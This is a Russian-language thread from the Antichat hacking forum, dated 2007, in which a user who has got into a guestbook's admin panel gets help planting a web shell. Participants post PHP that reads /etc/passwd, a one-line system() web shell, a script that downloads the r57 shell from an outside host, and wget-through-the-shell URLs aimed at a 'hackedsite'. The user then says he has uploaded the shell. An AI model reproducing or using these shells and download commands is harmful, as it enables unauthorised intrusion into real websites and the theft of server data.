Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Поправьте (https://forum.antichat.xyz/showthread.php?t=45804)

IIAHbI4 01.08.2007 16:30
Поправьте
 
Зашел в админку гостевухи
написал

PHP код:
<? if (isset($_GET['do'])) {
  readfile("/etc/passwd");
  die();
}
?>
в броузере пишу /guest.php?do
ничё не вылазает...
и ещё вопрос, как залить шелл?Вот так чтоль?-

PHP код:
<? system($_POST["cmd"])) 
 
?>
и потом в броузере /guest.php? POST: cmd=[command]
?

иль просто помогите r57 залить. спасиб

halkfild 01.08.2007 16:39
1. да он читает файл..

2. мини-шелл))

PHP код:
<PRE>
<?
system($_GET["cmd"]);  
?>
</PRE>
или $_POST['cmd'] смотря как передаешь..

З.Ы.

у тя лишняя скобка и нет ;

system($_POST["cmd"])) ;

ну и
Код HTML:
<PRE></PRE>
добавь для нормального отображения

IIAHbI4 01.08.2007 16:44
а если вот так:
[PHP]
<?php
$filen="httpL//www.xxx.ru/r57.php";
$file_new="shell.php";
$data = implode("", file($filen));
$fp = fopen($file_new, "w");
fputs($fp, $data);
fclose($fp);
?>
[PHP]
и потом guest/shell.php

Unli-M-iteD 01.08.2007 16:44
/guest.php? POST: cmd=[command]
в таком виде и передавал?

IIAHbI4 01.08.2007 16:47
Всё спасиб, я сам разобрался =)
PHP код:
<?
$filen="httpL//www.xxx.ru/r57.php";
$file_new="shell.php";
$data implode(""file($filen));
$fp fopen($file_new"w");
fputs($fp$data);
fclose($fp);
?>
вот это помогло =)

//хех... ведь могу думать,когда захочу )

Unli-M-iteD 01.08.2007 16:48
Можно проще
Цитата:
<PRE>
<?
system($_GET["cmd"]);
?>
</PRE>
потом http://site.ru/guest.php?cmd=wget http://[адресс шела]
будет загружен в текущую директорию, если права позволяют

Piflit 01.08.2007 16:49
/guest.php?cmd=wget www.yoursite.ru/r57shell.php www.hackedsite.ru/shell.php

IIAHbI4 01.08.2007 16:56
угу,всё норм, уже всё залил, снач шелл, щас ремвьюв....всё,

топикклоус


Время: 05:21